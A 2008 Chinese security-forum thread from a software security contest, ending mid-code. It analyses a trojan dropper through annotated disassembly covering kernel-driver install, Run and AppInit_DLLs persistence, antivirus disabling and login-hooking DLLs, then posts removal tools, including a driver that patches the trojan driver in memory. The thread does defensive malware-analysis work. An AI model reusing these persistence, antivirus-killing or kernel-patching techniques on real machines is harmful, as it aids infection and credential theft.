首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 4)腾讯公司2008软件安全竞赛
    3. 发新帖
[原创]第三轮
发表于: 2008-10-29 11:37 3247

[原创]第三轮

shoooo 活跃值
16
2008-10-29 11:37
3247
一楼贴分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
外面的exe
1. 把资源100这个驱动放到system32\drivers\HBKernel32.sys 并起来
2. 驱动0x22E007
3. 把资源102这个dll放到system32\HBQQXX.dll
4. 驱动0x22E00F 4 0
5. 创建一个临时批处理,把system32\HBQQXX.dll改成system32\X.tmp
6. 驱动0x22E00F 4 1
7. 向HBInject32窗口发送 WM_COPYDATA: HBQQXX.dll 让这个dll启动
8. 打开HBInjectMutex mutex, 不在的话,则把101放到system32\system.exe, 并起来
9. 注册设置自启动system.exe
10. 批处理自删除
 
00401200     55                 push ebp
00401201     8BEC               mov ebp,esp
00401203     81C4 5CFDFFFF      add esp,-2A4
00401209     6A 00              push 0
0040120B     E8 30090000        call a.00401B40                   ; jmp to kernel32.GetModuleHandleA
00401210     8985 90FDFFFF      mov dword ptr ss:[ebp-270],eax
00401216     68 A0000000        push 0A0
0040121B     68 00304000        push a.00403000                   ; ASCII "my.exe"
00401220     68 00304000        push a.00403000                   ; ASCII "my.exe"
00401225     E8 6F080000        call a.00401A99                   解码进程名表
0040122A     C745 FC FFFFFFFF   mov dword ptr ss:[ebp-4],-1
00401231     E8 0E050000        call a.00401744                   如果my.exe存在,则杀掉进程
00401236     6A 00              push 0
00401238     68 E1204000        push a.004020E1                   ; ASCII "AskTao"
0040123D     E8 7E080000        call a.00401AC0                   ;向AskTao发送0x01-0x10000的消息
00401242     E8 8A030000        call a.004015D1                   注册表干坏事,灭360
00401247     6A 00              push 0
00401249     6A 00              push 0
0040124B     6A 03              push 3
0040124D     6A 00              push 0
0040124F     6A 00              push 0
00401251     68 000000C0        push C0000000
00401256     68 E8204000        push a.004020E8                   ; ASCII "\\.\slHBKernel32"
0040125B     E8 AA080000        call a.00401B0A                   ; jmp to kernel32.CreateFileA
00401260     83F8 FF            cmp eax,-1
00401263     0F85 EF000000      jnz a.00401358
00401269     68 04010000        push 104
0040126E     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401274     50                 push eax
00401275     E8 D8080000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
0040127A     68 F9204000        push a.004020F9                   ; ASCII "\drivers\HBKernel32.sys"
0040127F     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401285     50                 push eax
00401286     E8 27090000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
0040128B     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401291     50                 push eax
00401292     6A 64              push 64
00401294     6A 0A              push 0A
00401296     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
0040129C     E8 AF050000        call a.00401850                   把资源100这个驱动放到system32\drivers\HBKernel32.sys
004012A1     0BC0               or eax,eax
004012A3     0F84 B2000000      je a.0040135B
004012A9     68 3F000F00        push 0F003F
004012AE     6A 00              push 0
004012B0     6A 00              push 0
004012B2     E8 37090000        call a.00401BEE                   ; jmp to advapi32.OpenSCManagerA
004012B7     0BC0               or eax,eax
004012B9     0F84 97000000      je a.00401356
004012BF     8985 F0FDFFFF      mov dword ptr ss:[ebp-210],eax
004012C5     6A 10              push 10
004012C7     68 11214000        push a.00402111                   ; ASCII "HBKernel32"
004012CC     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
004012D2     E8 1D090000        call a.00401BF4                   ; jmp to advapi32.OpenServiceA
004012D7     0BC0               or eax,eax
004012D9     75 31              jnz short a.0040130C
004012DB     6A 00              push 0
004012DD     6A 00              push 0
004012DF     6A 00              push 0
004012E1     6A 00              push 0
004012E3     68 2E214000        push a.0040212E                   ; ASCII "Boot Bus Extender"
004012E8     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004012EE     50                 push eax
004012EF     6A 00              push 0
004012F1     6A 00              push 0
004012F3     6A 01              push 1
004012F5     6A 10              push 10
004012F7     68 1C214000        push a.0040211C                   ; ASCII "HBKernel32 Driver"
004012FC     68 11214000        push a.00402111                   ; ASCII "HBKernel32"
00401301     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
00401307     E8 DC080000        call a.00401BE8                   ; jmp to advapi32.CreateServiceA
0040130C     0BC0               or eax,eax
0040130E     74 3B              je short a.0040134B
00401310     8985 ECFDFFFF      mov dword ptr ss:[ebp-214],eax
00401316     6A 00              push 0
00401318     6A 00              push 0
0040131A     50                 push eax
0040131B     E8 EC080000        call a.00401C0C                   ; jmp to advapi32.StartServiceA
00401320     0BC0               or eax,eax
00401322     74 1C              je short a.00401340
00401324     6A 00              push 0
00401326     6A 00              push 0
00401328     6A 03              push 3
0040132A     6A 00              push 0
0040132C     6A 00              push 0
0040132E     68 000000C0        push C0000000
00401333     68 E8204000        push a.004020E8                   ; ASCII "\\.\slHBKernel32"
00401338     E8 CD070000        call a.00401B0A                   ; jmp to kernel32.CreateFileA
0040133D     8945 FC            mov dword ptr ss:[ebp-4],eax
00401340     FFB5 ECFDFFFF      push dword ptr ss:[ebp-214]
00401346     E8 97080000        call a.00401BE2                   ; jmp to advapi32.CloseServiceHandle
0040134B     FFB5 F0FDFFFF      push dword ptr ss:[ebp-210]
00401351     E8 8C080000        call a.00401BE2                   ; jmp to advapi32.CloseServiceHandle
00401356     EB 03              jmp short a.0040135B
00401358     8945 FC            mov dword ptr ss:[ebp-4],eax
0040135B     837D FC FF         cmp dword ptr ss:[ebp-4],-1
0040135F     74 1E              je short a.0040137F
00401361     6A 00              push 0
00401363     8D85 E8FDFFFF      lea eax,dword ptr ss:[ebp-218]
00401369     50                 push eax
0040136A     6A 00              push 0
0040136C     6A 00              push 0
0040136E     6A 00              push 0
00401370     6A 00              push 0
00401372     68 07E02200        push 22E007
00401377     FF75 FC            push dword ptr ss:[ebp-4]
0040137A     E8 A3070000        call a.00401B22                   ; jmp to kernel32.DeviceIoControl
0040137F     68 04010000        push 104
00401384     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
0040138A     50                 push eax
0040138B     E8 C2070000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
00401390     68 40214000        push a.00402140
00401395     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
0040139B     50                 push eax
0040139C     E8 11080000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004013A1     68 AE314000        push a.004031AE                   ; ASCII "HBQQXX.dll"
004013A6     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004013AC     50                 push eax
004013AD     E8 00080000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004013B2     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004013B8     50                 push eax
004013B9     6A 66              push 66
004013BB     6A 0A              push 0A
004013BD     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
004013C3     E8 88040000        call a.00401850                   把资源102这个dll放到system32\HBQQXX.dll
004013C8     0BC0               or eax,eax
004013CA     0F85 DB000000      jnz a.004014AB
004013D0     68 04010000        push 104
004013D5     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013DB     50                 push eax
004013DC     E8 71070000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
004013E1     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013E7     50                 push eax
004013E8     6A 00              push 0
004013EA     6A 00              push 0
004013EC     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013F2     50                 push eax
004013F3     E8 60070000        call a.00401B58                   ; jmp to kernel32.GetTempFileNameA
004013F8     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
004013FE     50                 push eax
004013FF     E8 18070000        call a.00401B1C                   ; jmp to kernel32.DeleteFileA
00401404     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
0040140A     50                 push eax
0040140B     6A 20              push 20
0040140D     8D85 5CFDFFFF      lea eax,dword ptr ss:[ebp-2A4]
00401413     50                 push eax
00401414     E8 2B060000        call a.00401A44
00401419     8D85 5CFDFFFF      lea eax,dword ptr ss:[ebp-2A4]
0040141F     50                 push eax
00401420     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401426     50                 push eax
00401427     FF75 FC            push dword ptr ss:[ebp-4]
0040142A     E8 79040000        call a.004018A8                    4.5.6.
0040142F     6A 04              push 4
00401431     6A 00              push 0
00401433     8D85 F4FDFFFF      lea eax,dword ptr ss:[ebp-20C]
00401439     50                 push eax
0040143A     E8 3D070000        call a.00401B7C                   ; jmp to kernel32.MoveFileExA
0040143F     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401445     50                 push eax
00401446     6A 66              push 66
00401448     6A 0A              push 0A
0040144A     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
00401450     E8 FB030000        call a.00401850
00401455     0BC0               or eax,eax
00401457     74 52              je short a.004014AB
00401459     68 42214000        push a.00402142                   ; ASCII "HBInject32"
0040145E     6A 00              push 0
00401460     E8 6B070000        call a.00401BD0                   ; jmp to user32.FindWindowA
00401465     0BC0               or eax,eax
00401467     74 42              je short a.004014AB
00401469     8985 8CFDFFFF      mov dword ptr ss:[ebp-274],eax
0040146F     C785 80FDFFFF 0000>mov dword ptr ss:[ebp-280],0
00401479     68 AE314000        push a.004031AE                   ; ASCII "HBQQXX.dll"
0040147E     E8 41070000        call a.00401BC4                   ; jmp to kernel32.lstrlenA
00401483     8985 84FDFFFF      mov dword ptr ss:[ebp-27C],eax
00401489     8D05 AE314000      lea eax,dword ptr ds:[4031AE]
0040148F     8985 88FDFFFF      mov dword ptr ss:[ebp-278],eax
00401495     8D85 80FDFFFF      lea eax,dword ptr ss:[ebp-280]
0040149B     50                 push eax
0040149C     6A 00              push 0
0040149E     6A 4A              push 4A
004014A0     FFB5 8CFDFFFF      push dword ptr ss:[ebp-274]
004014A6     E8 31070000        call a.00401BDC                   ; jmp to user32.SendMessageA
004014AB     68 4D214000        push a.0040214D                   ; ASCII "HBInjectMutex"
004014B0     6A 00              push 0
004014B2     68 03001F00        push 1F0003
004014B7     E8 C6060000        call a.00401B82                   ; jmp to kernel32.OpenMutexA
004014BC     0BC0               or eax,eax
004014BE     0F85 A4000000      jnz a.00401568
004014C4     E8 6B060000        call a.00401B34                   ; jmp to ntdll.RtlGetLastWin32Error
004014C9     83F8 02            cmp eax,2
004014CC     0F85 9C000000      jnz a.0040156E
004014D2     68 04010000        push 104
004014D7     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014DD     50                 push eax
004014DE     E8 6F060000        call a.00401B52                   ; jmp to kernel32.GetSystemDirectoryA
004014E3     68 5B214000        push a.0040215B                   ; ASCII "\System.exe"
004014E8     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014EE     50                 push eax
004014EF     E8 BE060000        call a.00401BB2                   ; jmp to kernel32.lstrcatA
004014F4     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
004014FA     50                 push eax
004014FB     6A 65              push 65
004014FD     6A 0A              push 0A
004014FF     FFB5 90FDFFFF      push dword ptr ss:[ebp-270]       ; a.00400000
00401505     E8 46030000        call a.00401850
0040150A     0BC0               or eax,eax
0040150C     74 58              je short a.00401566
0040150E     C785 A4FDFFFF 4400>mov dword ptr ss:[ebp-25C],44
00401518     8D85 A4FDFFFF      lea eax,dword ptr ss:[ebp-25C]
0040151E     50                 push eax
0040151F     E8 28060000        call a.00401B4C                   ; jmp to kernel32.GetStartupInfoA
00401524     8D85 94FDFFFF      lea eax,dword ptr ss:[ebp-26C]
0040152A     50                 push eax
0040152B     8D85 A4FDFFFF      lea eax,dword ptr ss:[ebp-25C]
00401531     50                 push eax
00401532     6A 00              push 0
00401534     6A 00              push 0
00401536     6A 00              push 0
00401538     6A 00              push 0
0040153A     6A 00              push 0
0040153C     6A 00              push 0
0040153E     8D85 F8FEFFFF      lea eax,dword ptr ss:[ebp-108]
00401544     50                 push eax
00401545     6A 00              push 0
00401547     E8 C4050000        call a.00401B10                   ; jmp to kernel32.CreateProcessA
0040154C     0BC0               or eax,eax
0040154E     74 16              je short a.00401566
00401550     FFB5 94FDFFFF      push dword ptr ss:[ebp-26C]
00401556     E8 A9050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
0040155B     FFB5 98FDFFFF      push dword ptr ss:[ebp-268]
00401561     E8 9E050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
00401566     EB 06              jmp short a.0040156E
00401568     50                 push eax
00401569     E8 96050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
0040156E     837D FC FF         cmp dword ptr ss:[ebp-4],-1
00401572     74 08              je short a.0040157C
00401574     FF75 FC            push dword ptr ss:[ebp-4]
00401577     E8 88050000        call a.00401B04                   ; jmp to kernel32.CloseHandle
0040157C     8D85 7CFDFFFF      lea eax,dword ptr ss:[ebp-284]
00401582     50                 push eax
00401583     68 3F000F00        push 0F003F
00401588     6A 00              push 0
0040158A     68 67214000        push a.00402167                   ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040158F     68 02000080        push 80000002
00401594     E8 67060000        call a.00401C00                   ; jmp to advapi32.RegOpenKeyExA
00401599     0BC0               or eax,eax
0040159B     75 26              jnz short a.004015C3
0040159D     6A 0B              push 0B
0040159F     68 A1214000        push a.004021A1                   ; ASCII "System.exe"
004015A4     6A 01              push 1
004015A6     6A 00              push 0
004015A8     68 95214000        push a.00402195                   ; ASCII "HBService32"
004015AD     FFB5 7CFDFFFF      push dword ptr ss:[ebp-284]
004015B3     E8 4E060000        call a.00401C06                   ; jmp to advapi32.RegSetValueExA
004015B8     FFB5 7CFDFFFF      push dword ptr ss:[ebp-284]
004015BE     E8 37060000        call a.00401BFA                   ; jmp to advapi32.RegCloseKey
004015C3     E8 38FAFFFF        call a.00401000
004015C8     6A 00              push 0
004015CA     E8 59050000        call a.00401B28                   ; jmp to kernel32.ExitProcess
004015CF     C9                 leave
004015D0     C3                 retn
 
------------------------------------------------------------------------
system.exe
1. 创建 HBInjectMutex mutex
2. 打开驱动\\.\slHBKernel32, 没有就先起驱动
3. 驱动0x22E007
4. 驱动0x22E00B 4 PID  ?
5. 创建隐藏窗口HBInject32
   WM_CREATE: 解码dll表, 建定时器
   WM_CLOSE: 把当前的dll给StopServiceEx
   WM_QUERYENDSESSION: 把当前的dll给StopServiceEx
   WM_COPYDATA: 收到dll名字后(这个版本是HBQQXX.dll), 先把当前的这个dll给StopServiceEx, 再加载新的,StartSeviceEx
   WM_TIMER: 1. "Software\Microsoft\Windows NT\CurrentVersion\Windows" AppInit_Dlls
                "Software\Microsoft\Windows\CurrentVersion\Run" system.exe
             2. 一个一个加载上面那些dll(其实是N个版本), 调用他们的StartServiceEx
             3. 杀360
 
    
 
------------------------------------------------------------------------
HBQQXX.dll
StartServiceEx: setwindowshook
StopServiceEx: stophook
dllmain: 只搞tty3d.exe和qqlogin.exe 怎么盗的没兴趣
 
------------------------------------------------------------------------
HBKernel32.sys
idb

[注意]看雪招聘,专注安全领域的专业人才平台!

收藏
免费
支持
分享
最新回复 (9)
shoooo
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
私信
2
因为不清楚写物理内存和ZwSystemDebugControl 算0环方法还是3还方法
所以我很老实的写了个驱动方法

//killhb.sys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#include "ntddk.h"
 
__declspec(dllimport) NTSTATUS __stdcall
ZwQuerySystemInformation(
    ULONG   SysInformatoinClass,
    PVOID   SystemInformation,
    ULONG   SystemInformationLength,
    PULONG  ReturnLength OPTIONAL
    );
 
BOOLEAN __stdcall GetHBBaseAndSize(PULONG KrnlBase, PULONG KrnlSize)
{
    BOOLEAN     rt;
    ULONG       PoolSize;
    PVOID       Pool;
    NTSTATUS    status;
    PVOID       ModuleStart;
    ULONG       i;
    ULONG       j;
    PUCHAR      Name;
 
    PoolSize = 0x1000;
    Name = NULL;
    rt = FALSE;
    Pool = ExAllocatePoolWithTag(NonPagedPool, PoolSize, ' kdD');
    if (Pool == NULL)
        return FALSE;
    do
    {
        status = ZwQuerySystemInformation(0x0B, Pool, PoolSize, NULL);
        if (status == STATUS_INFO_LENGTH_MISMATCH)
        {
            if (Pool != NULL)
                ExFreePool(Pool);
            PoolSize = PoolSize * 2;
            Pool = ExAllocatePoolWithTag(NonPagedPool, PoolSize, ' kdD');
            continue ;
        }
        break ;
    }while(1);
    if (!NT_SUCCESS(status))
    {
        if (Pool != NULL)
        {
            ExFreePool(Pool);
        }
        return FALSE;
    }
    ModuleStart = (PVOID)((PUCHAR)Pool+4);
    for (i=0; i<*(PULONG)Pool; i++)
    {
        if (rt == TRUE)
            break ;
        Name = strrchr((PUCHAR)ModuleStart+0x1C+i*0x11C, '\\');
        if (Name != NULL)
            Name = Name + 1;
        else
            Name = (PUCHAR)ModuleStart+0x1C+i*0x11C;
        if (Name != NULL)
        {
            if (_stricmp(Name, "HBKernel32.sys") == 0)
            {
                *KrnlBase = *(PULONG)((PUCHAR)ModuleStart + i*0x11C + 0x08);
                *KrnlSize = *(PULONG)((PUCHAR)ModuleStart + i*0x11C + 0x0C);
                rt = TRUE;
                break ;
            }
        }
    }
    if (Pool != NULL)
        ExFreePool(Pool);
 
    return rt;
}
 
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    BOOLEAN rt;
    ULONG   base = 0;
    ULONG size = 0;
    rt = GetHBBaseAndSize(&base, &size);
    DbgPrint("%08X, %08X, %08X", rt, base, size);
    if (rt)
    {
        if (*(PUSHORT)(base+0x2D6D) == 0x3D83)
        {
                *(PULONG)(base+0x3F20) = 1;
                DbgPrint("fuck");
        }
    }
 
    return STATUS_UNSUCCESSFUL;
}


专杀程序
//3.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
#include <windows.h>
#include <shlwapi.h>
#pragma comment (lib, "shlwapi.lib")
#pragma comment (linker, "/subsystem:windows")
#pragma comment (linker, "/entry:start")
#pragma comment (linker, "/filealign:0x200")
 
void s0()
{
    HMODULE mod;
    CreateMutex(NULL, FALSE, "HBInjectMutex");
    mod = GetModuleHandle("HBQQXX.dll");
    if (mod != NULL)
    {
        GetProcAddress(mod, "StopServiceEx");
        __asm call eax
        FreeLibrary(mod);
    }
}
 
int s1()
{
    HANDLE  hFile;
    DWORD   Input;
    DWORD   Output;
    DWORD   tmp;
    hFile = CreateFile("\\\\.\\slHBkernel32", GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        return 0;
    }
    Input = 0;
    Output = 0;
    DeviceIoControl(hFile, 0x22E00F, &Input, 4, NULL, 0, &tmp, NULL);
    DeviceIoControl(hFile, 0x22E00B, &Input, 4, &Output, 4, &tmp, NULL);
    CloseHandle(hFile);
    return 1;
}
 
int s2()
{
    SC_HANDLE   schService;
    SC_HANDLE   schSCManager;
    char    szFileName[MAX_PATH];
 
    GetSystemDirectory(szFileName, MAX_PATH);
    lstrcat(szFileName, "\\drivers\\killhb.sys");
    CopyFile("killhb.sys", szFileName, FALSE);
    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (NULL == schSCManager)
    {
        return 0;
    }
    schService = OpenService(schSCManager, "killhb", SC_MANAGER_ALL_ACCESS);
    if (NULL == schService)
    {
        schService = CreateService(schSCManager,
                                "killhb",
                                "killhb",
                                SERVICE_ALL_ACCESS,
                                SERVICE_KERNEL_DRIVER,
                                SERVICE_DEMAND_START, 
                                SERVICE_ERROR_NORMAL,  
                                szFileName,            
                                NULL,
                                NULL,
                                NULL,
                                NULL,
                                NULL
                                ); 
        Sleep(200);
    }
    if (NULL == schService)
    {
        CloseServiceHandle(schSCManager);
        return 0;
    }
    StartService(schService, 0, NULL);
    Sleep(200);
    DeleteService(schService);
    CloseServiceHandle(schService);
    CloseServiceHandle(schSCManager);
    DeleteFile(szFileName);
 
    return 1;
}
 
int s3()
{
    HWND    hWnd;
    hWnd = FindWindow(NULL, "HBInject32");
    if (hWnd == NULL)
    {
        return 0;
    }
    SendMessage(hWnd, WM_CLOSE, 0, 0);
    SendMessage(hWnd, WM_QUERYENDSESSION, 0, 0);
    return 1;
}
 
int s4()
{
    SHDeleteValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", "AppInit_Dlls");
    SHDeleteValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "HBService32");
    SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet\\Services\\HBKernel32");
    SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\HBKernel32");
    SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet002\\Services\\HBKernel32");
    SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet003\\Services\\HBKernel32");
    SHDeleteKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\HBKernel32");
    return 1;
}
 
int s5()
{
    char src[MAX_PATH];
    char dst[MAX_PATH];
    GetTempPath(MAX_PATH, dst);
    lstrcat(dst, "\\2132378.sh");
    DeleteFile(dst);
    GetSystemDirectory(src, MAX_PATH);
    lstrcat(src, "\\system.exe");
    MoveFile(src, dst);
    DeleteFile(dst);
 
    GetTempPath(MAX_PATH, dst);
    lstrcat(dst, "\\9345834.sh");
    DeleteFile(dst);
    GetSystemDirectory(src, MAX_PATH);
    lstrcat(src, "\\HBQQXX.dll");
    MoveFile(src, dst);
    DeleteFile(dst);
 
    GetTempPath(MAX_PATH, dst);
    lstrcat(dst, "\\5475451.sh");
    DeleteFile(dst);
    GetSystemDirectory(src, MAX_PATH);
    lstrcat(src, "\\drivers\\HBKernel32.sys");
    MoveFile(src, dst);
    DeleteFile(dst);
 
    return 1;
}
 
 
 
void start()
{
    s0();
    if (s1() == 0)
    {
        MessageBox(0, "HBkernel32可能不存在", "killhb", 0);
        goto home;
    }
    if (s2() == 0)
    {
        MessageBox(0, "加载killhb驱动失败", "killhb", 0);
        goto home;
    }
    if (s3() == 0)
    {
        MessageBox(0, "清理system.exe失败", "killhb", 0);
        goto home;
    }
    if (s4() == 0)
    {
        MessageBox(0, "清理注册表失败", "killhb", 0);
        goto home;
    }
    if (s5() == 0)
    {
        MessageBox(0, "清理尸体失败", "killhb", 0);
        goto home;
    }
    MessageBox(0, "完成", "killhb", 0);
 
home:
    ExitProcess(0);
}


附件是编译好的
执行驱动线程停了,system.exe进程杀了,注册表干净了,尸体都放到temp目录了,即木马功能都没了。 重启后更健康
上传的附件:
2008-10-29 11:40
0
kangaroo
雪    币: 264
活跃值: (30)
能力值: ( LV12,RANK:250 )
在线值:
发帖
回帖
粉丝
私信
3
shooo多来几种方法
2008-10-29 17:21
0
shoooo
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
私信
4
不着急, 等你们出了详细规则再做不迟
2008-10-29 17:54
0
shoooo
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
私信
5
贴一个纯3环的方法,应该nt各平台通用的
驱动文件删掉, 注册表清掉,垃圾文件清掉, 不需要重启

p.s. 物理内存, ZwSystemDebugControl, gdt之流都是旁门左道,我就不贴这些了

主要代码片断
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
int s2()
{
    //提权
    HANDLE hToken;
    TOKEN_PRIVILEGES priv = {1, {0, 0, SE_PRIVILEGE_ENABLED}};
    if (!LookupPrivilegeValue(NULL, "SeDebugPrivilege", &priv.Privileges[0].Luid))
    {
        return -1;
    }
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
    {
        return -2;
    }
    if (!AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof(priv), 0, 0))
    {
        return -3;
    }
    CloseHandle(hToken);
 
    //找system
    HANDLE  hC;
    DWORD   dwPid;
    BOOL    bNext;
    dwPid = 0;
    PROCESSENTRY32 p32 = {sizeof(p32)};
    hC = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    bNext = Process32First(hC, &p32);
    while (bNext)
    {
        if (lstrcmpi(p32.szExeFile, "SYSTEM") == 0)
        {
            dwPid = p32.th32ProcessID;
            break ;
        }
        bNext = Process32Next(hC, &p32);
    }
    CloseHandle(hC);
    if (dwPid == 0)
    {
        return -4;
    }
 
    //找到HB驱动的基址和大小
    DWORD   HBBase;
    DWORD   HBSize;
    char    *offset;
    int     Status;
    LPBYTE  buf;
    DWORD   dwSize;
    DWORD   i;
    buf = NULL;
    dwSize = 0x2000;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        Status = ZwQuerySystemInformation(11, buf, dwSize, NULL);
    } while (Status == 0xC0000004);
    HBBase = 0;
    HBSize = 0;
    for (i=0; i<*(LPDWORD)buf; i++)
    {
        offset = strrchr((char *)buf+4+i*0x11C+0x1C, '\\');
        if (offset != NULL)
            offset = offset + 1;
        else
            offset = (char *)buf+4+i*0x11C+0x1C;
        if (offset != NULL)
        {
            if (lstrcmpi(offset, "HBKernel32.sys") == 0)
            {
                HBBase = *(PULONG)(buf + 4 + i*0x11C + 0x08);
                HBSize = *(PULONG)(buf + 4 + i*0x11C + 0x0C);
                break ;
            }
        }
    }
    VirtualFree(buf, 0, MEM_RELEASE);
    if (HBBase == 0)
    {
        return -5;
    }
 
    //打开system
    HANDLE  hProcess;
    hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwPid);
    if (hProcess == NULL)
    {
        return -6;
    }
 
    //找HB线程ID
    DWORD   StartAddress;
    DWORD   dwTid;
    buf = NULL;
    dwSize = 0x2000;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        Status = ZwQuerySystemInformation(5, buf, dwSize, NULL);
    } while (Status == 0xC0000004);
    dwTid = 0;
    offset = (char *)buf;
    while (1)
    {
        if (*(LPDWORD)(offset+0x44) != dwPid)
        {
            offset += *(LPDWORD)offset;
            continue ;
        }
        for (i=0; i<*(LPDWORD)(offset+0x04); i++)
        {
